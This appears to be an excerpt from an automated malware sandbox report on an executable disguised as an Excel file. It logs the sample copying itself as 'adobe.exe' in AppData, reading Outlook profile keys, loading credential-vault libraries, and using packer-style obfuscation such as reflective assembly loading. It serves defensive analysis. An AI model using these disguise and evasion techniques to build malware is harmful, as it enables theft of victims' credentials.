Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"	Jump to behavior

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Section loaded: edputil.dll

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: BL NBNSA240600050.xlsx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: BL NBNSA240600050.xlsx.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: BL NBNSA240600050.xlsx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: thQh.pdb source: BL NBNSA240600050.xlsx.exe, adobe.exe.2.dr
Source:	Binary string: thQh.pdbSHA256 source: BL NBNSA240600050.xlsx.exe, adobe.exe.2.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.BL NBNSA240600050.xlsx.exe.32df0c0.5.raw.unpack, lNjw1JhxSV5n0cCMNW.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.BL NBNSA240600050.xlsx.exe.8110000.9.raw.unpack, lNjw1JhxSV5n0cCMNW.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: BL NBNSA240600050.xlsx.exe, FrmLogin.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, MP38G7Vnbsb34JkM2R.cs	.Net Code: E76HrBxktI System.Reflection.Assembly.Load(byte[])

Source: BL NBNSA240600050.xlsx.exe

Static PE information: 0xA1756FE1 [Wed Nov 3 04:15:29 2055 UTC]

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 0_2_078101B0 push eax; iretd	0_2_078101B1
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 0_2_07E45B48 pushfd ; retf	0_2_07E45B4C
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_00D00610 push edx; retf	2_2_00D0061A
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_00D00C6D push edi; retf	2_2_00D00C7A
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_06379F31 pushfd ; iretd	2_2_06379F32
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_0637BAB0 push es; ret	2_2_0637BAC0
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Code function: 2_2_06377952 push es; ret	2_2_06377960
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_05C265D1 push cs; ret	3_2_05C265D2
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_05C28458 push ds; ret	3_2_05C2845A
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_05C277C7 push ss; ret	3_2_05C277CA
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_05C257D0 push es; ret	3_2_05C257D2
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_05C257F3 push es; ret	3_2_05C257FA
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_05C257F0 push es; ret	3_2_05C257F2
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_05C27709 push ss; ret	3_2_05C2770A
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_05C276D0 push ss; ret	3_2_05C276D2
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_05C26688 push cs; ret	3_2_05C2668A
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_05C26693 push cs; ret	3_2_05C267B2
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_05C27630 push ss; ret	3_2_05C2765A
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_05C2A1E0 pushfd ; ret	3_2_05C2A1E1
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_05C201B0 push eax; iretd	3_2_05C201B1
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_05C2F150 push ebx; ret	3_2_05C2F152
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_05C2F0E3 push ebx; ret	3_2_05C2F0EA
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_05C2F0E1 push ebx; ret	3_2_05C2F0E2
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_05C2F0B8 push ebx; ret	3_2_05C2F0BA
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_05C2F3A9 push esp; ret	3_2_05C2F3AA
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_05C2F327 push esp; ret	3_2_05C2F332
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_05C2F2D1 push esp; ret	3_2_05C2F2D2
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_05C2F253 push esp; ret	3_2_05C2F25A
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_05C2EDD3 push ecx; ret	3_2_05C2EDDA
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_05C2FDD9 pushad ; ret	3_2_05C2FDDA
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Code function: 3_2_05C2ADE3 pushfd ; ret	3_2_05C2ADE9

Source: BL NBNSA240600050.xlsx.exe

Static PE information: section name: .text entropy: 7.880091500507158

Source: 0.2.BL NBNSA240600050.xlsx.exe.32df0c0.5.raw.unpack, lNjw1JhxSV5n0cCMNW.cs	High entropy of concatenated method names: 'Kb0HWSL22O', 'RgtTUJcyZL', 'jHu2HrxObq', 'UAF22bihQq', 'Hla2xZGvyo', 'XAB2tPq0q8', 'aeMUEk3AsB3Pt', 'xw8jvYcwb', 'eSADOWkF2', 'hfhQtMtDc'
Source: 0.2.BL NBNSA240600050.xlsx.exe.32df0c0.5.raw.unpack, NkEtj4xdihRGcDPjVY.cs	High entropy of concatenated method names: 'HVYMFtP2f', 'CuEekxjKf', 'WGqJ3oTFt', 'GCn1bRmSG', 'Kbtl1TeP0', 'Fy7hiDf8S', 'e5JqCGSck', 'C2SLkryPZ', 'ksT8NQvKO', 'zvqT1Z212'
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, K8917oFDM9aCkNDFBqm.cs	High entropy of concatenated method names: 'Nfp9sGZxur', 'aw09uYq0Y3', 'SQq9rQ9Mke', 'Kec9iH16sB', 'CbI9mpEr5l', 'fXD9ygk2g6', 'gTh9U1kaSm', 'VJy9kcTPdi', 'w3q9WEuexN', 'J5e97JRtc0'
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, lnLgB9ArQJDBJXbtV2.cs	High entropy of concatenated method names: 'cSe6gNlyeA', 'xrB6b9gFsE', 'KCP6A32AV0', 'PsT6ZMFlGJ', 'TbU62gnado', 'YAq6JpLFw0', 'dmD60T9vDk', 'OLh6hv6bgk', 'Eep63lrXRD', 'pj86YbXcnL'
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, mwpVWaCa35qDe8PjFK.cs	High entropy of concatenated method names: 'Dispose', 'V9RF8pT9mR', 'jZkR22aNsw', 'MJL55IhUY3', 'T6IFLIKDga', 'H1hFz8GFY2', 'ProcessDialogKey', 'lEGRDV0xmh', 'EF4RFCoK4w', 'Lf1RRUbt0L'
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, PwiX6RFRdnPqG7PpAPo.cs	High entropy of concatenated method names: 'CbAPsK8f5W', 'RZXPulmBQF', 'wMpPr8NiiN', 'dxcpFj4VhWcUHZ4CLl2', 'aeA9Ji433Gt6UOBqgoB', 'QWFBJ64xr3jtpkBN1Xv', 'WWvawt4L1u3A0a4HKgG', 'fJyuwj48UyRQ6sfvmld', 'yJmCPc4lJCWAoWytJPU'
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, WU6MGjOMCvVpcSrEqg.cs	High entropy of concatenated method names: 'u8SokFJE2l', 'jK0oW9wbuG', 'hNJoSf4LLo', 'sabo2a8Kev', 'I11o0quXcv', 'bBdohMmr1n', 'r3RoYoQhut', 'CGXo4hMWMM', 'MOdogVirZd', 'e8dovOYFYr'
Source: 0.2.BL NBNSA240600050.xlsx.exe.8300000.10.raw.unpack, nyp7h2lEkSktRx34mN.cs	High entropy of concatenated method names: 'kuEqxOSPBS', 'dWvqLyttYO', 'FbCjDqP8Vl', 'OkwjFBFx86', 'AoEqvKnSsg', 'QIiqbG9BSK', 'esxqOMVOVt', 'd5wqAXxKP2', 'pkUqZadEND', 'SMIqKIu15W'
